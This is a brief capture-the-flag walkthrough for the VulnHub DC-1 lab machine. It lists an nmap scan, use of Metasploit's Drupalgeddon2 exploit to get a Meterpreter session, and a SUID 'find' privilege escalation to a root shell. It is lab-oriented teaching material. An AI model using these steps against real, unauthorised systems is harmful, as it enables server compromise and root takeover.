CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)


29/11/2024 Shad Hussain Knowledge Views 212 Comments 0 Analytics Video English DMCA Add Favorite Copy Link
CTF Walk Through - DC-1 - VulnHub

Machine Link : https://www.vulnhub.com/entry/dc-1,292/ STEP1 nmap 192.168.0.104 -sSV -Pn -A FINDING PORT 80 IS OPEN ----------------------------------------------------------------------------------------------------------- STEP2 BROWES THE SITE OPEN MSFCONSOLE SEARCH FOR search exploit drupal msf6 exploit(unix/webapp/drupal_drupalgeddon2) options SET RHOSTS SET TARGETURI /user RUN meterpreter ls -la GET PREV ESEC find / -user root -perm -4000 -exec ls -ldb {} \; GO TO GTFOBIN AND SEARCH FOR find AND GET SHELL CODE https://gtfobins.github.io/gtfobins/find/#shell find . -exec /bin/sh \; -quit whoami root

Related articles

 WhatsApp no. else use your mail id to get the otp...!    Please tick to get otp in your mail id...!
 





© mutebreak.com | All Rights Reserved